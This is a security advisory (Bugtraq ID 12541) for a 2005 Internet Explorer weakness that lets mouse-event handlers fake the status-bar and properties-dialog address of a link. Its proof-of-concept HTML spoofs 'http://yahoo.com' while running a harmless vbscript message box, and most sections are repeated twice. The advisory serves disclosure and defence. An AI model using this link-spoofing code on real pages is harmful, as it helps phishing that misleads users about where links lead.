Microsoft Internet Explorer Mouse Event URI Status Bar Obfuscation Weakness
BID:12541
Info
Microsoft Internet Explorer Mouse Event URI Status Bar Obfuscation Weakness
| Bugtraq ID: | 12541 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 14 2005 12:00AM |
| Updated: | Feb 14 2005 12:00AM |
| Credit: | Discovery of this weakness is credited to Paul <[email protected]>. |
| Vulnerable: |
Microsoft Internet Explorer 5.0.1 SP4 Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 Microsoft Internet Explorer 6.0 SP2 - do not use Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.5 SP2 Microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer Mouse Event URI Status Bar Obfuscation Weakness
Microsoft Internet Explorer is reported prone to a URI obfuscation weakness.
The issue presents itself when a HREF tag contains certain mouse events.
This issue may be leveraged by an attacker to display false information in the status bar or URI property dialog of an affected browser, allowing an attacker to present web pages to unsuspecting users that seem to originate from a trusted location. This may facilitate phishing style attacks; other attacks may also be possible.
Microsoft Internet Explorer is reported prone to a URI obfuscation weakness.
The issue presents itself when a HREF tag contains certain mouse events.
This issue may be leveraged by an attacker to display false information in the status bar or URI property dialog of an affected browser, allowing an attacker to present web pages to unsuspecting users that seem to originate from a trusted location. This may facilitate phishing style attacks; other attacks may also be possible.
Exploit / POC
Microsoft Internet Explorer Mouse Event URI Status Bar Obfuscation Weakness
The following exploit is available:
<script>
var aa=0;var intid;
</script>
Try right-clicking on the link and clicking on properties. Notice the address is spoofed even on the properties window, yet the link takes you to an address with the vbscript protocol.
Note: Does not work when the "open" command is selected from the right-click menu.
<a href='vbscript:msgbox("Psych!")' id="chglink" onmouseover="aa=1;var intid=setInterval('if(aa==1){window.status=\'http://yahoo.com\'}',10)"
onmouseout='aa=0;chglink.href="vbscript:msgbox(\"Psych!\")";clearInterval(intid);window.status=""' onmousedown="if
(event.button==2){chglink.href='http://yahoo.com'}">click</a>
Just a simple one:
<a href="http://google.com"><button style="border:0;background-color:white;cursor:hand" onclick='location.assign("vbscript:msgbox(\"Psych!\")")'><font
color="blue">click</font></button></a>
The following exploit is available:
<script>
var aa=0;var intid;
</script>
Try right-clicking on the link and clicking on properties. Notice the address is spoofed even on the properties window, yet the link takes you to an address with the vbscript protocol.
Note: Does not work when the "open" command is selected from the right-click menu.
<a href='vbscript:msgbox("Psych!")' id="chglink" onmouseover="aa=1;var intid=setInterval('if(aa==1){window.status=\'http://yahoo.com\'}',10)"
onmouseout='aa=0;chglink.href="vbscript:msgbox(\"Psych!\")";clearInterval(intid);window.status=""' onmousedown="if
(event.button==2){chglink.href='http://yahoo.com'}">click</a>
Just a simple one:
<a href="http://google.com"><button style="border:0;background-color:white;cursor:hand" onclick='location.assign("vbscript:msgbox(\"Psych!\")")'><font
color="blue">click</font></button></a>
Solution / Fix
Microsoft Internet Explorer Mouse Event URI Status Bar Obfuscation Weakness
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer Mouse Event URI Status Bar Obfuscation Weakness
References:
References:
- Technet Security (Microsoft)